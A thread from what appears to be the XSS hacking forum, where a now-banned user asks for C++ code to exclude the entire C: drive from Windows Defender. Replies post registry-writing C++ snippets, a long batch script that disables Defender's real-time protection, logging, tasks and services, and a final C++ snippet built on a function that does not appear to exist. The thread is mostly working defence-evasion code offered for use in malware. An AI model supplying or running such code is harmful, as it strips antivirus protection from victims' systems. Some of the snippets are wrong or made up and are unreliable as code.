• XSS.stack #1 – первый литературный журнал от юзеров форума

Помогите с добавлением в исключение виндовс дефендора [C++]

Отслеживать
Russian_Coder

Russian_Coder

(L2) cache
Забанен
Регистрация
31.01.2024
Сообщения
424
Реакции
189
Пожалуйста, обратите внимание, что пользователь заблокирован
Есть у кого нибудь кусок кода с добавление в исключением вин дефа диска С
на с++
 
Russian_Coder сказал(а):
Есть у кого нибудь кусок кода с добавление в исключением вин дефа диска С
на с++
C++: 
#include <Windows.h>
#include <iostream>
#include <ShObjIdl.h>

int main() {
    // Получаем HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules
    HKEY hKey;
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules", 0, KEY_SET_VALUE, &hKey) != ERROR_SUCCESS) {
        std::cerr << "Failed to open registry key." << std::endl;
        return 1;
    }

    // Изменяем значение в реестре
    DWORD value = 1;
    if (RegSetValueEx(hKey, L"C:\\", 0, REG_DWORD, (BYTE*)&value, sizeof(value)) != ERROR_SUCCESS) {
        std::cerr << "Failed to set registry value." << std::endl;
        RegCloseKey(hKey);
        return 1;
    }

    std::cout << "Successfully added C: to Windows Defender exclusion list." << std::endl;

    // Закрываем реестр
    RegCloseKey(hKey);

    return 0;
}



C++: 
#include <Windows.h>
#include <iostream>
#include <ShObjIdl.h>

int main() {
    // Путь к папке, которую нужно добавить в исключения Windows Defender
    LPCWSTR folderPath = L"C:\\";

    // Получаем HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
    HKEY hKey;
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths", 0, KEY_SET_VALUE, &hKey) != ERROR_SUCCESS) {
        std::cerr << "Failed to open registry key." << std::endl;
        return 1;
    }

    // Изменяем значение в реестре
    DWORD value = 1;
    if (RegSetValueEx(hKey, folderPath, 0, REG_DWORD, (BYTE*)&value, sizeof(value)) != ERROR_SUCCESS) {
        std::cerr << "Failed to set registry value." << std::endl;
        RegCloseKey(hKey);
        return 1;
    }

    std::wcout << L"Successfully added " << folderPath << L" to Windows Defender exclusion list." << std::endl;

    // Закрываем реестр
    RegCloseKey(hKey);

    return 0;
}
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Bash: 
rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
rem To also disable Windows Defender Security Center include this
rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
rem 0 - Disable Logging
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
rem Disable WD Tasks
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
rem Disable WD systray icon
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
rem Remove WD context menu
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
rem Disable WD services
rem For these to execute successfully, you may need to boot into safe mode due to tamper protect
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem added the following on 07/25/19 for win10v1903
reg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

на плюсы уже сам переводи :)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Require elevated privileges so you may need to run the application as an administrator.

C++: 
#include <windows.h>
#include <iostream>
#include <sddl.h>

#pragma comment(lib, "Advapi32.lib")

int main() {
    PSECURITY_DESCRIPTOR pSD = nullptr;
    if (!ConvertStringSecurityDescriptorToSecurityDescriptor(
        L"D: (A;;FA;;;WD)", SDDL_REVISION_1, &pSD, nullptr)) {
        std::cerr << "Failed to convert security descriptor: " << GetLastError() << std::endl;
        return 1;
    }

    if (!SetSystemFileProtection(NULL, L"C:\\", SE_FILE_OBJECT, pSD)) {
        std::cerr << "Failed to set exclusion: " << GetLastError() << std::endl;
        LocalFree(pSD);
        return 1;
    }

    LocalFree(pSD);
    std::cout << "Exclusion added successfully!" << std::endl;

    return 0;
}
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх